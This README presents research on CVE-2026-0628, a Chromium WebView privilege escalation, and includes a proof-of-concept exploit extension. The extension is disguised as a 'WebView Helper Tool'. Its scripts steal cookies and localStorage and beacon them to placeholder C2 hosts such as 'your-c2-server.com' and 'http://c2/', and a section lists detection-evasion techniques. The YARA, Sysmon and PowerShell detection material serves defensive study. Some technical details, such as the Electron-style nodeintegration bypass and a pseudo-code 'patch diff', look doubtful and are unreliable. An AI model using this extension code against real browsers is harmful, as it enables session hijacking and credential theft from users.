[![DOI](https://img.shields.io/badge/DOI-10.5281%2Fzenodo.18413764-blue?logo=zenodo&logoColor=white)](https://doi.org/10.5281/zenodo.18413764) = [doi.org/10.5281/zenodo.18413764](https://doi.org/10.5281/zenodo.18413764)

[![ORCID](https://img.shields.io/badge/ORCID-0009--0007--7728--256X-A6CE39?logo=orcid&logoColor=white)](https://orcid.org/0009-0007-7728-256X) = [orcid.org/0009-0007-7728-256X](https://orcid.org/0009-0007-7728-256X)

```markdown

README.md


# **CVE-2026-0628: Chromium WebView Privilege Escalation (Origin Spoofing) – Technical Research & Proof-of-Concept**

**Author:** Sastra Adi Wiguna (Purple Elite Teaming)
**Research Date:** January 2026
**CVE ID:** CVE-2026-0628
**CVSS v3.1:** 8.8 (High)
**Affected Versions:** Chromium < 143.0.7499.192
**Patch Status:** Patched in Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139

---

## **1. Overview**

### **1.1 Research Purpose**
This repository documents **CVE-2026-0628**, a **high-severity privilege escalation vulnerability** in Chromium's WebView policy enforcement mechanism. The vulnerability allows malicious extensions to **bypass sandbox restrictions**, inject scripts into **privileged contexts** (e.g., `chrome://`), and **escalate privileges** to execute arbitrary code.

This research is **exclusively for defensive security purposes**, including:
- **Vulnerability analysis**
- **Detection engineering**
- **Mitigation strategy development**
- **Penetration testing (authorized environments only)**

### **1.2 Disclaimer**
- **Strictly for academic and defensive research.**
- **Do not use against production systems without authorization.**
- **Comply with all applicable laws and organizational security policies.**
- **Patch immediately:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139.

---

## **2. Technical Breakdown**

### **2.1 Root Cause**
**Insufficient policy enforcement** in Chromium's WebView implementation allows extensions to **escape sandbox boundaries** and access **privileged DOM contexts**.

**Vulnerable Flow:**
1. Malicious extension declares WebView usage in `manifest.json`.
2. Extension injects crafted HTML/JS payload via `<webview>` tag.
3. **WebView policy validation bypass** → Access to privileged pages (e.g., `chrome://settings`).
4. **Arbitrary script execution** in privileged contexts.

**CVSS Vector:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 Exploit Architecture**
#### **Malicious Extension Template**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}
```

#### **Critical Injection Vector (`payload.js`)**
```javascript
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Key bypass parameter
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '<img src=x onerror="fetch(\`http://c2/?cookies=\${document.cookie}\`)">';
        `
      });
    });
    document.body.appendChild(webview);
  }
}
```

---

## **3. Impact Assessment**

| **Attack Phase**       | **Technical Impact**                     | **Business Impact**               | **CVSS Metrics**          |
|------------------------|------------------------------------------|-----------------------------------|---------------------------|
| Extension Install      | User consent → Persistence                | Social engineering vector        | UI:R (Required)           |
| WebView Bypass         | Sandbox escape → Privileged context       | Session hijacking                 | S:U → C:H/I:H/A:H         |
| Script Injection       | DOM manipulation → Data exfiltration     | Credential theft                 | PR:N (No Privs)           |
| Persistence            | Background script → C2 beaconing          | Lateral movement prep            | AC:L (Low Complexity)     |

---

## **4. Detection & Forensics**

### **4.1 YARA Rule for Malicious Extensions**
```yara
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}
```

### **4.2 Sysmon Event Signatures**
- **Event ID 1:** `chrome.exe` → Suspicious WebView creation.
- **Event ID 3:** Network connection → Extension → External C2.
- **Registry:** `HKCU\Software\Google\Chrome\Extensions\[malicious_id]`.

---

## **5. Patch Analysis & Bypass Vectors**

### **5.1 Fixed Version Diff (Chrome 143.0.7499.192+)**
```javascript
// Vulnerable (pre-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Weak policy check
}

// Patched
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Content-Security-Policy hardening
  }
}
```

### **5.2 Mitigation Implementation**
#### **Enterprise GPO Template**
```json
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}
```

#### **Runtime Detection Script (PowerShell)**
```powershell
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}
```

---

## **6. Proof-of-Concept (PoC) Exploit**

### **6.1 Directory Structure**
```
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html
```

### **6.2 Core Files**
#### **`manifest.json` (Bypass Manifest)**
```json
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}
```

#### **`background.js` (Persistence & C2 Beacon)**
```javascript
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}
```

#### **`content.js` (WebView Trigger & Injection)**
```javascript
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();
```

---

## **7. Lab Reproduction**

### **7.1 Requirements**
- **Vulnerable Chrome:** 143.0.7499.191
- **OS:** Windows 10/11 (VM recommended)
- **Tools:** Burp Suite (proxy), REMnux (forensics)

### **7.2 Steps**
1. **Download Chrome 143.0.7499.191** (vulnerable).
2. **Launch with flags:**
   ```bash
   chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
   ```
3. **Load extension:**
   - Navigate to `chrome://extensions/`.
   - Enable **Developer Mode**.
   - Click **Load Unpacked** → Select `cve-2026-0628-poc/`.
4. **Trigger exploit:**
   - Navigate to `chrome://new-tab-page/`.
   - Observe WebView creation in **DevTools**.
5. **Monitor traffic:**
   - Burp Suite (`localhost:8080`) → Capture exfiltration to C2.
6. **Verify success:**
   - Network tab → Beacon to `your-c2-server.com`.
   - Console: `"CVE-2026-0628 OWNED"`.

---

## **8. Detection Evasion Techniques**
- **Steganography:** Encode exfiltration in image pixels.
- **Domain Generation:** DGA for C2 rotation.
- **Timing Attacks:** Delay execution 5-30s post-install.
- **Manifest Obfuscation:** Base64 encode sensitive strings.

---

## **9. Mitigation & Patch Workflow**
- **Immediate Action:** Update Chrome/Edge to patched versions.
- **Enterprise GPO:**
  ```json
  {
    "ExtensionInstallBlacklist": ["*"],
    "WebViewRestrictions": {
      "DisableWebView": true,
      "BlockNodeIntegration": true
    }
  }
  ```
- **Runtime Detection:**
  ```powershell
  # Scan for malicious extensions
  Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
    Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
  ```

---

## **10. Forensic Analysis**
### **10.1 Volatility3 Commands**
```bash
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/
```

### **10.2 YARA Rule for Memory Dumps**
```yara
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}
```

---

## **11. Conclusion**
### **11.1 Key Findings**
- **CVE-2026-0628** enables **privilege escalation** via WebView policy bypass.
- **Impact:** Session hijacking, credential theft, lateral movement.
- **Mitigation:** Patch Chrome/Edge, enforce GPO restrictions, monitor for malicious extensions.

### **11.2 Recommendations**
- **Patch immediately** to Chrome ≥143.0.7499.192 or Edge ≥143.0.3650.139.
- **Deploy YARA/Sysmon rules** for detection.
- **Restrict extensions** via Enterprise GPO.
- **Conduct red team exercises** to validate defenses.

---

## **12. Legal & Ethical Considerations**
- **Authorized use only.**
- **Do not deploy in production without explicit permission.**
- **Report vulnerabilities responsibly** to vendors.

**Contact:** For defensive security questions, contact the author via [GitHub Issues](#).

---
**© 2026 Sastra Adi Wiguna. All rights reserved.**

```
